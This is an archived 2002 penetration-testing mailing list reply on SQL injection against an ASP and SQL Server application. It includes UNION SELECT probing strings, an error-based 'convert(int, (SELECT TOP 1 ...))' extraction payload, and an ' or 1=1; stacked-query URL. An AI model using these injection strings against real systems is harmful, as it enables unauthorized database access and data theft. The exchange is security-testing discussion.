Home page logo

pen-test logo Penetration Testing mailing list archives

Re: sql injection - operand type clash
From: "Kevin Spett" <kspett () spidynamics com>
Date: Fri, 15 Mar 2002 14:45:04 -0800

Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
Microsoft][ODBC SQL Server Driver][SQL Server]Operand type clash: ntext is
incompatible with int

I have tried

union select username,1,1,.... (20+ columns) from table
union select 1,username,1,1....
union select 1,1,username,1...

Yeah, that can eat up some time.
Try using the convert() hack to get the result of your query back in an
error message.  Assuming that you're dealing with a quoted vulnerability try
this injection string:
' %2b convert(int, (SELECT TOP 1 fieldname FROM table WHERE fieldname NOT IN
('knownvalue', 'knownvalue2'))) %2b '

You should get a convert error back that includes the result of the

I've also tried  union select convert(sql_variant,username),1,1,...

I think sql_variant only works in the most recent version of SQL Server, so
it may not even be a recognized data type

My second problem is that I cannot execute this:
http://target/da.asp?userid=user&apos; or 1=1; select * from

You're not likely to get the results of a stacked query in your returned
page.  Stacking queries is mostly useful for executing stored procedures.

Good luck.

Kevin Spett
SPI Dynamics, Inc.

This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]